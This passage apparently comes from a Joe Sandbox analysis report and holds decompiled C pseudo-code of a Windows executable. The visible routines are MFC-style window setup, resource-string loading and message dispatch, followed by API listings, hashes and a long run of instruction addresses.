                  						_t42 = E00416609(_t55, _t91, _t82, _t86, _t91, __eflags); // executed
                  						__eflags = _t42;
                  						if(_t42 != 0) {
                  							DragAcceptFiles( *( *((intOrPtr*)(_t91 + 0x20)) + 0x20), 1);
                  							E00412C34(_t86,  *((intOrPtr*)(_t91 + 0x4c)));
                  							UpdateWindow( *(_t86 + 0x20));
                  							_v36 = _t55;
                  							E004157B0( &_v84,  *( *((intOrPtr*)(_t91 + 0x20)) + 0x20));
                  							 *[fs:0x0] = _v44;
                  							return 1;
                  						} else {
                  							_v32 = _t55;
                  							E004157B0( &_v80, _t82);
                  							__eflags = 0;
                  							 *[fs:0x0] = _v40;
                  							return 0;
                  						}
                  					}
                  				} else {
                  					_t52 = GetVersion();
                  					_t103 = _t52 - 4;
                  					if(_t52 >= 4) {
                  						goto L4;
                  					} else {
                  						_push(0xffffffff);
                  						_push(0);
                  						_push(0x66);
                  						E00417146(_t54, _t81, GetVersion, _t91, _t103);
                  						L3:
                  						 *[fs:0x0] = _v32;
                  						return 0;
                  					}
                  				}
                  			}


                  APIs
                  • GetVersion.KERNEL32(38A11573), ref: 0040171E
                  • GetVersion.KERNEL32 ref: 00401724
                  • DragAcceptFiles.SHELL32(?,00000001), ref: 00401859
                  • UpdateWindow.USER32(?), ref: 0040186E
                    • Part of subcall function 00417146: __EH_prolog3.LIBCMT ref: 0041714D
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Version$AcceptDragFilesH_prolog3UpdateWindow
                  • String ID:
                  • API String ID: 1881653373-0
                  • Opcode ID: e1d20883db954ebd26c60d39e0b636da3169bcd13c438ce3e85def14de5a3047
                  • Instruction ID: a17e9845648d9b61e4f7684013c638e6b3f52b511be3bda972cb7d9a165d9d00
                  • Opcode Fuzzy Hash: e1d20883db954ebd26c60d39e0b636da3169bcd13c438ce3e85def14de5a3047
                  • Instruction Fuzzy Hash: 6641B1B13443009BD714EB25DD42BAAB7E5AB84B14F00093FFA46933D1EB79E805875A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 32%
                  			E00402500(char** __ecx, struct HINSTANCE__* _a4, unsigned int _a8) {
                  				intOrPtr _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				void* __ebx;
                  				void* __edi;
                  				void* __ebp;
                  				int _t28;
                  				char _t35;
                  				char _t38;
                  				char _t41;
                  				char* _t45;
                  				char** _t49;
                  				char* _t50;
                  				char* _t53;
                  				signed int _t54;
                  				signed short* _t67;
                  				void* _t69;
                  				int _t72;
                  				intOrPtr _t73;
                  				short* _t75;
                  				intOrPtr _t77;
                  				void* _t78;
                  				void* _t79;
                  
                  				_t71 = _a8;
                  				_t65 = _a4;
                  				_t49 = __ecx;
                  				if(FindResourceA(_a4, (_a8 >> 0x00000004) + 0x00000001 & 0x0000ffff, 6) == 0) {
                  					L2:
                  					return 0;
                  				} else {
                  					_t67 = E004019E0(_t65, _t24, _t71);
                  					_t79 = _t78 + 0xc;
                  					if(_t67 != 0) {
                  						_t3 =  &(_t67[1]); // 0x2
                  						_t75 = _t3;
                  						_t28 = WideCharToMultiByte(3, 0, _t75,  *_t67 & 0x0000ffff, 0, 0, 0, 0); // executed
                  						_t72 = _t28;
                  						if((0x00000001 -  *((intOrPtr*)( *_t49 - 0x10 + 0xc)) |  *((intOrPtr*)( *_t49 - 0x10 + 8)) - _t72) < 0) {
                  							_push(_t72);
                  							E00401470(_t49, _t49, _t67);
                  						}
                  						_t53 =  *_t49;
                  						_t60 =  *_t67 & 0x0000ffff;
                  						WideCharToMultiByte(3, 0, _t75,  *_t67 & 0x0000ffff, _t53, _t72, 0, 0);
                  						_pop(_t76);
                  						if(_t72 < 0) {
                  							L8:
                  							E00401090(_t53, _t60, 0x80070057);
                  							asm("int3");
                  							asm("int3");
                  							asm("int3");
                  							asm("int3");
                  							asm("int3");
                  							asm("int3");
                  							asm("int3");
                  							_push(_t49);
                  							_push(_t72);
                  							_t73 = _v8;
                  							_t50 = _t53;
                  							if(_t73 != 0) {
                  								_t54 = _v12;
                  								if(_t54 == 0) {
                  									L12:
                  									E00401090(_t54, _t60, 0x80070057);
                  								}
                  								_t35 =  *_t50;
                  								_t77 =  *((intOrPtr*)(_t35 - 0xc));
                  								_push(_t67);
                  								_t69 = _t54 - _t35;
                  								_t60 = 0x00000001 -  *((intOrPtr*)(_t35 - 4)) |  *((intOrPtr*)(_t35 - 8)) - _t73;
                  								if(1 < 0) {
                  									_push(_t73);
                  									E00401470(_t50, _t50, _t69);
                  									_t54 = _v16;
                  								}
                  								_t38 =  *_t50;
                  								_push(_t73);
                  								if(_t69 > _t77) {
                  									_push(_t54);
                  									_t54 =  *(_t38 - 8);
                  									_push(_t54);
                  									_push(_t38);
                  									E0043065F(_t50, _t54);
                  								} else {
                  									_t60 =  *(_t38 - 8);
                  									_t54 = _t38 + _t69;
                  									_push(_t54);
                  									_push( *(_t38 - 8));
                  									_push(_t38);
                  									E00430B25(_t50);
                  								}
                  								_t79 = _t79 + 0x10;
                  								_pop(_t67);
                  								_pop(_t76);
                  								if(_t73 < 0) {
                  									goto L12;
                  								}
                  								_t41 =  *_t50;
                  								if(_t73 >  *((intOrPtr*)(_t41 - 8))) {
                  									goto L12;
                  								}
                  								 *((intOrPtr*)(_t41 - 0xc)) = _t73;
                  								 *((char*)(_t73 +  *_t50)) = 0;
                  								return _t41;
                  							} else {
                  								return E00401E30(_t53);
                  							}
                  						} else {
                  							_t45 =  *_t49;
                  							if(_t72 >  *((intOrPtr*)(_t45 - 8))) {
                  								goto L8;
                  							} else {
                  								 *(_t45 - 0xc) = _t72;
                  								( *_t49)[_t72] = 0;
                  								return 1;
                  							}
                  						}
                  					} else {
                  						goto L2;
                  					}
                  				}
                  			}


                  APIs
                  • FindResourceA.KERNEL32(?,?,00000006), ref: 0040251A
                    • Part of subcall function 004019E0: LoadResource.KERNEL32(?,?,?,?,0040252C,?,00000000,?,?,00402740,00000000,?,?,?,?,0040AD0B), ref: 004019EC
                  • WideCharToMultiByte.KERNELBASE(00000003,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 00402552
                  • WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,?,?,00000000,00000000,00000000), ref: 00402589
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ByteCharMultiResourceWide$FindLoad
                  • String ID:
                  • API String ID: 861045882-0
                  • Opcode ID: 7863595d9ff105e0f61620a44138432fde7c611104670e4d42e31e0e37da1537
                  • Instruction ID: ab90c26927212f4ee8fca040aa4f0871524c501861b284741b334b9420958e70
                  • Opcode Fuzzy Hash: 7863595d9ff105e0f61620a44138432fde7c611104670e4d42e31e0e37da1537
                  • Instruction Fuzzy Hash: 4221A5323412107FE3219B5ADC89F6777ACEB85750F11416AF540EB2D4D6B8AC5187A8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E004110C4(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				signed int _t156;
                  				signed int _t158;
                  				signed int* _t161;
                  				intOrPtr _t168;
                  				intOrPtr* _t169;
                  				signed int _t172;
                  				signed int _t175;
                  				signed int* _t179;
                  				signed int* _t182;
                  				signed int _t186;
                  				signed int _t190;
                  				signed int _t194;
                  				signed int _t198;
                  				signed int _t201;
                  				signed int* _t203;
                  				signed int _t204;
                  				signed int _t205;
                  				intOrPtr* _t206;
                  				signed int _t207;
                  				signed int _t222;
                  				signed int _t226;
                  				unsigned int _t233;
                  				void* _t234;
                  
                  				_t209 = __ecx;
                  				_push(0x70);
                  				E00431A9B(E0044B122, __ebx, __edi, __esi);
                  				_t231 = __ecx;
                  				 *((intOrPtr*)(_t234 - 0x10)) = 0;
                  				 *((intOrPtr*)(_t234 - 0x14)) = 0x7fffffff;
                  				_t198 =  *(_t234 + 8);
                  				 *(_t234 - 4) = 0;
                  				if(_t198 != 0x111) {
                  					__eflags = _t198 - 0x4e;
                  					if(_t198 != 0x4e) {
                  						_t233 =  *(_t234 + 0x10);
                  						__eflags = _t198 - 6;
                  						if(_t198 == 6) {
                  							E00410A7D(_t209, _t231,  *((intOrPtr*)(_t234 + 0xc)), E0040EE3C(_t198, __ecx, _t233));
                  						}
                  						__eflags = _t198 - 0x20;
                  						if(_t198 != 0x20) {
                  							L12:
                  							_t156 =  *(_t231 + 0x4c);
                  							__eflags = _t156;
                  							if(_t156 == 0) {
                  								L20:
                  								_t158 =  *((intOrPtr*)( *_t231 + 0x28))();
                  								 *(_t234 + 0x10) = _t158;
                  								_t201 = (_t158 ^  *(_t234 + 8)) & 0x000001ff;
                  								E0040D713(_t201, _t234 - 0x14, _t231, _t233, 7);
                  								_t203 = 0x464b18 + _t201 * 0xc;
                  								 *(_t234 - 0x18) = _t203;
                  								__eflags =  *(_t234 + 8) -  *_t203;
                  								if( *(_t234 + 8) !=  *_t203) {
                  									L25:
                  									_t161 =  *(_t234 - 0x18);
                  									_t204 =  *(_t234 + 0x10);
                  									 *_t161 =  *(_t234 + 8);
                  									_t161[2] = _t204;
                  									while(1) {
                  										__eflags =  *_t204;
                  										if( *_t204 == 0) {
                  											break;
                  										}
                  										__eflags =  *(_t234 + 8) - 0xc000;
                  										_push(0);
                  										_push(0);
                  										if( *(_t234 + 8) >= 0xc000) {
                  											_push(0xc000);
                  											_push( *((intOrPtr*)( *(_t234 + 0x10) + 4)));
                  											while(1) {
                  												_t205 = E0040CDA9();
                  												__eflags = _t205;
                  												if(_t205 == 0) {
                  													break;
                  												}
                  												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t205 + 0x10)))) -  *(_t234 + 8);
                  												if( *((intOrPtr*)( *((intOrPtr*)(_t205 + 0x10)))) ==  *(_t234 + 8)) {
                  													( *(_t234 - 0x18))[1] = _t205;
                  													E0040D747(_t234 - 0x14);
                  													L113:
                  													_t206 =  *((intOrPtr*)(_t205 + 0x14));
                  													L114:
                  													_push(_t233);
                  													L115:
                  													_push( *((intOrPtr*)(_t234 + 0xc)));
                  													L116:
                  													_t168 =  *_t206(); // executed
                  													L117:
                  													 *((intOrPtr*)(_t234 - 0x10)) = _t168;
                  													goto L118;
                  												}
                  												_push(0);
                  												_push(0);
                  												_push(0xc000);
                  												_t207 = _t205 + 0x18;
                  												__eflags = _t207;
                  												_push(_t207);
                  											}
                  											_t204 =  *(_t234 + 0x10);
                  											L36:
                  											_t204 =  *_t204();
                  											 *(_t234 + 0x10) = _t204;
                  											continue;
                  										}
                  										_push( *(_t234 + 8));
                  										_push( *((intOrPtr*)(_t204 + 4)));
                  										_t175 = E0040CDA9();
                  										 *(_t234 + 0x10) = _t175;
                  										__eflags = _t175;
                  										if(_t175 == 0) {
                  											goto L36;
                  										}
                  										( *(_t234 - 0x18))[1] = _t175;
                  										E0040D747(_t234 - 0x14);
                  										L29:
                  										_t222 =  *((intOrPtr*)( *(_t234 + 0x10) + 0x10)) - 1;
                  										__eflags = _t222 - 0x53;
                  										if(__eflags > 0) {
                  											goto L118;
                  										}
                  										switch( *((intOrPtr*)(_t222 * 4 +  &M00411688))) {
                  											case 0:
                  												_push(E00422D89(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc)));
                  												goto L44;
                  											case 1:
                  												_push( *(__ebp + 0xc));
                  												goto L44;
                  											case 2:
                  												__eax = __esi;
                  												__eax = __esi >> 0x10;
                  												__eflags = __eax;
                  												_push(__eax);
                  												__eax = __si & 0x0000ffff;
                  												_push(__si & 0x0000ffff);
                  												__eax = E0040EE3C(__ebx, __ecx,  *(__ebp + 0xc));
                  												goto L50;
                  											case 3:
                  												_push(__esi);
                  												__eax = E0040EE3C(__ebx, __ecx,  *(__ebp + 0xc));
                  												goto L42;
                  											case 4:
                  												_push(__esi);
                  												L44:
                  												__ecx = __edi; // executed
                  												__eax =  *__ebx(); // executed
                  												goto L117;
                  											case 5:
                  												__ecx = __ebp - 0x28;
                  												E00422859(__ebp - 0x28) =  *(__esi + 4);
                  												__ecx = __ebp - 0x7c;
                  												 *((char*)(__ebp - 4)) = 1;
                  												 *(__ebp - 0x24) =  *(__esi + 4);
                  												__eax = E0040D77C(__ecx, __eflags);
                  												__eax =  *__esi;
                  												__esi =  *(__esi + 8);
                  												 *((char*)(__ebp - 4)) = 2;
                  												 *(__ebp - 0x5c) = __eax;
                  												__eax = E0040EE68(__ecx, __edi, __esi, __eflags, __eax);
                  												__eflags = __eax;
                  												if(__eax == 0) {
                  													__eax =  *(__edi + 0x4c);
                  													__eflags = __eax;
                  													if(__eax != 0) {
                  														__ecx = __eax + 0x24;
                  														__eax = E00424500(__eax + 0x24, __edi, __esi,  *(__ebp - 0x5c));
                  														__eflags = __eax;
                  														if(__eax != 0) {
                  															 *(__ebp - 0x2c) = __eax;
                  														}
                  													}
                  													__eax = __ebp - 0x7c;
                  												}
                  												_push(__esi);
                  												_push(__eax);
                  												__eax = __ebp - 0x28;
                  												_push(__ebp - 0x28);
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
                  												_t84 = __ebp - 0x5c;
                  												 *_t84 =  *(__ebp - 0x5c) & 0x00000000;
                  												__eflags =  *_t84;
                  												__ecx = __ebp - 0x7c;
                  												 *(__ebp - 0x10) = __ebp - 0x28;
                  												 *((char*)(__ebp - 4)) = 1;
                  												__eax = E0040F76D(__ebx, __ebp - 0x7c, __edi, __esi,  *_t84);
                  												goto L59;
                  											case 6:
                  												__ecx = __ebp - 0x28;
                  												E00422859(__ebp - 0x28) =  *(__esi + 4);
                  												_push( *(__esi + 8));
                  												 *(__ebp - 0x24) =  *(__esi + 4);
                  												__eax = __ebp - 0x28;
                  												_push(__ebp - 0x28);
                  												__ecx = __edi;
                  												 *((char*)(__ebp - 4)) = 3;
                  												__eax =  *__ebx();
                  												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
                  												 *(__ebp - 0x10) = __ebp - 0x28;
                  												L59:
                  												__ecx = __ebp - 0x28;
                  												 *((char*)(__ebp - 4)) = 0;
                  												__eax = E00422E06(__ecx);
                  												goto L118;
                  											case 7:
                  												__eax =  *(__ebp + 0xc);
                  												__eax =  *(__ebp + 0xc) >> 0x10;
                  												__eflags = __eax;
                  												_push(__eax);
                  												__eax = E0040EE3C(__ebx, __ecx, __esi);
                  												goto L62;
                  											case 8:
                  												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                  												_push( *(__ebp + 0xc) >> 0x10);
                  												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                  												goto L42;
                  											case 9:
                  												goto L114;
                  											case 0xa:
                  												_push(E0041F4E8(__ebx, __ecx, __edi, __esi, __eflags, __esi));
                  												__eax =  *(__ebp + 0xc);
                  												__eax =  *(__ebp + 0xc) >> 0x10;
                  												L62:
                  												_push(__eax);
                  												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                  												L50:
                  												_push(__eax);
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												goto L117;
                  											case 0xb:
                  												_push(__esi);
                  												goto L110;
                  											case 0xc:
                  												_push( *(__ebp + 0xc));
                  												goto L66;
                  											case 0xd:
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												goto L118;
                  											case 0xe:
                  												__eax =  *(__ebp + 0xc);
                  												__eax =  *(__ebp + 0xc) >> 0x10;
                  												__eflags = __eax;
                  												_push(__eax);
                  												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                  												goto L69;
                  											case 0xf:
                  												_push(__esi >> 0x10);
                  												__eax = __si;
                  												goto L69;
                  											case 0x10:
                  												__eax = __esi;
                  												__eax = __esi >> 0x10;
                  												__eflags = __eax;
                  												_push(__eax);
                  												__eax = __si & 0x0000ffff;
                  												goto L72;
                  											case 0x11:
                  												__eax = E0040EE3C(__ebx, __ecx, __esi);
                  												goto L48;
                  											case 0x12:
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												goto L117;
                  											case 0x13:
                  												_push(E0040EE3C(__ebx, __ecx,  *(__ebp + 0xc)));
                  												_push(E0040EE3C(__ebx, __ecx, __esi));
                  												__eax = 0;
                  												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
                  												_t112 =  *((intOrPtr*)(__edi + 0x20)) == __esi;
                  												__eflags = _t112;
                  												__eax = 0 | _t112;
                  												goto L75;
                  											case 0x14:
                  												__eax = E00422D89(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
                  												goto L77;
                  											case 0x15:
                  												__eax = E0041F4E8(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
                  												goto L77;
                  											case 0x16:
                  												__esi = __esi >> 0x10;
                  												_push(__esi >> 0x10);
                  												__eax = __si;
                  												_push(__si);
                  												__eax = E0041F4E8(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
                  												goto L75;
                  											case 0x17:
                  												_push( *(__ebp + 0xc));
                  												goto L81;
                  											case 0x18:
                  												_push(__esi);
                  												L81:
                  												__eax = E0040EE3C(__ebx, __ecx);
                  												L77:
                  												_push(__eax);
                  												goto L66;
                  											case 0x19:
                  												__eax = __esi;
                  												__eax = __esi >> 0x10;
                  												__eflags = __eax;
                  												_push(__eax);
                  												__eax = __si & 0x0000ffff;
                  												goto L84;
                  											case 0x1a:
                  												__eax = __si;
                  												__esi = __esi >> 0x10;
                  												__ecx = __si;
                  												_push(__ecx);
                  												L84:
                  												_push(__eax);
                  												__eax = E0040EE3C(__ebx, __ecx,  *(__ebp + 0xc));
                  												goto L75;
                  											case 0x1b:
                  												_push(__esi);
                  												__eax = E0040EE3C(__ebx, __ecx,  *(__ebp + 0xc));
                  												goto L69;
                  											case 0x1c:
                  												__eax =  *(__ebp + 0xc);
                  												__eax =  *(__ebp + 0xc) >> 0x10;
                  												__eflags = __eax;
                  												_push(__eax);
                  												__eax = E0040EE3C(__ebx, __ecx, __esi);
                  												goto L88;
                  											case 0x1d:
                  												__ecx =  *(__ebp + 0xc);
                  												__edx = __cx;
                  												__ecx =  *(__ebp + 0xc) >> 0x10;
                  												__ecx = __cx;
                  												 *((intOrPtr*)(__ebp + 8)) = __edx;
                  												 *(__ebp + 0xc) = __ecx;
                  												__eflags = __eax - 0x2a;
                  												if(__eax != 0x2a) {
                  													_push(__ecx);
                  													_push(__edx);
                  													goto L111;
                  												}
                  												_push(E0040EE3C(__ebx, __ecx, __esi));
                  												_push( *(__ebp + 0xc));
                  												_push( *((intOrPtr*)(__ebp + 8)));
                  												goto L73;
                  											case 0x1e:
                  												_push(__esi);
                  												L66:
                  												__ecx = __edi; // executed
                  												__eax =  *__ebx(); // executed
                  												goto L118;
                  											case 0x1f:
                  												_push(__esi);
                  												_push( *(__ebp + 0xc));
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												goto L2;
                  											case 0x20:
                  												__eax = __si;
                  												__eflags = __esi;
                  												__ecx = __si;
                  												_push(__ecx);
                  												L42:
                  												_push(__eax);
                  												goto L116;
                  											case 0x21:
                  												__eax =  *(__ebp + 0xc);
                  												_push(__esi);
                  												__eax =  *(__ebp + 0xc) >> 0x10;
                  												L88:
                  												_push(__eax);
                  												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                  												L75:
                  												_push(__eax);
                  												goto L73;
                  											case 0x22:
                  												__eax = __si;
                  												__esi = __esi >> 0x10;
                  												__ecx = __si;
                  												_push(__si);
                  												L72:
                  												_push(__eax);
                  												_push( *(__ebp + 0xc));
                  												L73:
                  												__ecx = __edi; // executed
                  												__eax =  *__ebx(); // executed
                  												goto L118;
                  											case 0x23:
                  												__eax = __si;
                  												__esi = __esi >> 0x10;
                  												__ecx = __si;
                  												_push(__si);
                  												_push(__si);
                  												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                  												_push( *(__ebp + 0xc) >> 0x10);
                  												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                  												_push( *(__ebp + 0xc) & 0x0000ffff);
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
                  												L6:
                  												__eflags = _t194;
                  												if(_t194 != 0) {
                  													goto L118;
                  												}
                  												goto L39;
                  											case 0x24:
                  												__eax = __si;
                  												__esi = __esi >> 0x10;
                  												__ecx = __si;
                  												_push(__si);
                  												_push(__si);
                  												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                  												_push( *(__ebp + 0xc) >> 0x10);
                  												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                  												_push( *(__ebp + 0xc) & 0x0000ffff);
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												goto L118;
                  											case 0x25:
                  												goto L118;
                  											case 0x26:
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												 *(__ebp - 0x10) = __eax;
                  												__eflags = __eax;
                  												if(__eax == 0) {
                  													goto L118;
                  												}
                  												L39:
                  												 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
                  												E0040D747(_t234 - 0x14);
                  												_t172 = 0;
                  												__eflags = 0;
                  												goto L40;
                  											case 0x27:
                  												__eax = E0041F4E8(__ebx, __ecx, __edi, __esi, __eflags, __esi);
                  												L48:
                  												_push(__eax);
                  												L110:
                  												_push( *(__ebp + 0xc));
                  												goto L111;
                  											case 0x28:
                  												_push(E0041F4E8(__ebx, __ecx, __edi, __esi, __eflags, __esi));
                  												goto L115;
                  											case 0x29:
                  												_push(__esi);
                  												__eax = E0041F4E8(__ebx, __ecx, __edi, __esi, __eflags,  *(__ebp + 0xc));
                  												goto L69;
                  											case 0x2a:
                  												__ecx = __si & 0x0000ffff;
                  												_push(__si & 0x0000ffff);
                  												__eax = __esi;
                  												__eax = __esi >> 0x10;
                  												__ecx = __eax;
                  												__ecx = __eax & 0x0000f000;
                  												_push(__ecx);
                  												__eax = __eax & 0x00000fff;
                  												__eflags = __eax;
                  												_push(__eax);
                  												__eax = E0040EE3C(__ebx, __ecx,  *(__ebp + 0xc));
                  												goto L104;
                  											case 0x2b:
                  												__eax =  *(__ebp + 0xc) & 0x000000ff;
                  												_push(__esi);
                  												L69:
                  												_push(__eax);
                  												L111:
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												goto L118;
                  											case 0x2c:
                  												__eax = __si;
                  												__esi = __esi >> 0x10;
                  												__ecx = __si;
                  												_push(__si);
                  												_push(__si);
                  												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                  												_push( *(__ebp + 0xc) >> 0x10);
                  												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                  												L104:
                  												_push(__eax);
                  												goto L105;
                  											case 0x2d:
                  												__eax = __si;
                  												__esi = __esi >> 0x10;
                  												__ecx = __si;
                  												_push(__si);
                  												_push(__si);
                  												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                  												_push( *(__ebp + 0xc) >> 0x10);
                  												_push( *(__ebp + 0xc));
                  												L105:
                  												__ecx = __edi;
                  												__eax =  *__ebx();
                  												goto L2;
                  										}
                  									}
                  									_t179 =  *(_t234 - 0x18);
                  									_t58 =  &(_t179[1]);
                  									 *_t58 = _t179[1] & 0x00000000;
                  									__eflags =  *_t58;
                  									E0040D747(_t234 - 0x14);
                  									goto L39;
                  								}
                  								_t182 = _t203;
                  								__eflags =  *(_t234 + 0x10) - _t182[2];
                  								if( *(_t234 + 0x10) != _t182[2]) {
                  									goto L25;
                  								}
                  								_t205 = _t182[1];
                  								 *(_t234 + 0x10) = _t205;
                  								E0040D747(_t234 - 0x14);
                  								__eflags = _t205;
                  								if(_t205 == 0) {
                  									goto L39;
                  								}
                  								__eflags =  *(_t234 + 8) - 0xc000;
                  								if( *(_t234 + 8) < 0xc000) {
                  									goto L29;
                  								}
                  								goto L113;
                  							}
                  							__eflags =  *(_t156 + 0x74);
                  							if( *(_t156 + 0x74) <= 0) {
                  								goto L20;
                  							}
                  							__eflags = _t198 - 0x200;
                  							if(_t198 < 0x200) {
                  								L16:
                  								__eflags = _t198 - 0x100;
                  								if(_t198 < 0x100) {
                  									L18:
                  									__eflags = _t198 - 0x281 - 0x10;
                  									if(_t198 - 0x281 > 0x10) {
                  										goto L20;
                  									}
                  									L19:
                  									_t186 =  *((intOrPtr*)( *( *(_t231 + 0x4c)) + 0x94))(_t198,  *((intOrPtr*)(_t234 + 0xc)), _t233, _t234 - 0x10);
                  									__eflags = _t186;
                  									if(_t186 != 0) {
                  										goto L118;
                  									}
                  									goto L20;
                  								}
                  								__eflags = _t198 - 0x10f;
                  								if(_t198 <= 0x10f) {
                  									goto L19;
                  								}
                  								goto L18;
                  							}
                  							__eflags = _t198 - 0x209;
                  							if(_t198 <= 0x209) {
                  								goto L19;
                  							}
                  							goto L16;
                  						} else {
                  							_t190 = E00410AF5(_t198, _t231, _t231, _t233, _t233 >> 0x10);
                  							__eflags = _t190;
                  							if(_t190 != 0) {
                  								L2:
                  								 *((intOrPtr*)(_t234 - 0x10)) = 1;
                  								L118:
                  								_t169 =  *((intOrPtr*)(_t234 + 0x14));
                  								if(_t169 != 0) {
                  									 *_t169 =  *((intOrPtr*)(_t234 - 0x10));
                  								}
                  								 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
                  								E0040D747(_t234 - 0x14);
                  								_t172 = 1;
                  								L40:
                  								return E00431B73(_t172);
                  							}
                  							goto L12;
                  						}
                  					}
                  					_t226 =  *(_t234 + 0x10);
                  					__eflags =  *_t226;
                  					if( *_t226 == 0) {
                  						goto L39;
                  					}
                  					_push(_t234 - 0x10);
                  					_push(_t226);
                  					_push( *((intOrPtr*)(_t234 + 0xc)));
                  					_t194 =  *((intOrPtr*)( *__ecx + 0xf4))();
                  					goto L6;
                  				}
                  				_push( *(_t234 + 0x10));
                  				_push( *((intOrPtr*)(_t234 + 0xc)));
                  				if( *((intOrPtr*)( *__ecx + 0xf0))() == 0) {
                  					goto L39;
                  				}
                  				goto L2;
                  			}


























                  0x00411394
                  0x00411399
                  0x00411399
                  0x0041139c
                  0x0041139d
                  0x0041139e
                  0x004113a1
                  0x004113a2
                  0x004113a4
                  0x004113a6
                  0x004113aa
                  0x004113aa
                  0x004113aa
                  0x004113ae
                  0x004113b1
                  0x004113b4
                  0x004113b8
                  0x00000000
                  0x00000000
                  0x004113ce
                  0x004113d6
                  0x004113d9
                  0x004113dc
                  0x004113df
                  0x004113e2
                  0x004113e3
                  0x004113e5
                  0x004113e9
                  0x004113eb
                  0x004113ef
                  0x004113bd
                  0x004113bd
                  0x004113c0
                  0x004113c4
                  0x00000000
                  0x00000000
                  0x004113f4
                  0x004113f7
                  0x004113f7
                  0x004113fa
                  0x004113fc
                  0x00000000
                  0x00000000
                  0x0041140e
                  0x00411411
                  0x00411412
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00411421
                  0x00411422
                  0x00411425
                  0x00411401
                  0x00411401
                  0x00411402
                  0x00411338
                  0x00411338
                  0x00411339
                  0x0041133b
                  0x00000000
                  0x00000000
                  0x00411640
                  0x00000000
                  0x00000000
                  0x0041142a
                  0x00000000
                  0x00000000
                  0x00411436
                  0x00411438
                  0x00000000
                  0x00000000
                  0x0041143f
                  0x00411442
                  0x00411442
                  0x00411445
                  0x00411446
                  0x00000000
                  0x00000000
                  0x00411456
                  0x00411457
                  0x00000000
                  0x00000000
                  0x0041145c
                  0x0041145e
                  0x0041145e
                  0x00411461
                  0x00411462
                  0x00000000
                  0x00000000
                  0x0041131b
                  0x00000000
                  0x00000000
                  0x00411311
                  0x00411313
                  0x00000000
                  0x00000000
                  0x0041147a
                  0x00411481
                  0x00411482
                  0x00411484
                  0x00411487
                  0x00411487
                  0x00411487
                  0x00000000
                  0x00000000
                  0x00411490
                  0x00000000
                  0x00000000
                  0x0041149b
                  0x00000000
                  0x00000000
                  0x004114a4
                  0x004114a8
                  0x004114a9
                  0x004114ac
                  0x004114b0
                  0x00000000
                  0x00000000
                  0x004114b7
                  0x00000000
                  0x00000000
                  0x004114c1
                  0x004114ba
                  0x004114ba
                  0x00411495
                  0x00411495
                  0x00000000
                  0x00000000
                  0x004114c4
                  0x004114c6
                  0x004114c6
                  0x004114c9
                  0x004114ca
                  0x00000000
                  0x00000000
                  0x004114d8
                  0x004114db
                  0x004114de
                  0x004114e1
                  0x004114cd
                  0x004114cd
                  0x004114d1
                  0x00000000
                  0x00000000
                  0x004114e4
                  0x004114e8
                  0x00000000
                  0x00000000
                  0x004114f2
                  0x004114f5
                  0x004114f5
                  0x004114f8
                  0x004114fa
                  0x00000000
                  0x00000000
                  0x00411506
                  0x00411509
                  0x0041150c
                  0x0041150f
                  0x00411512
                  0x00411515
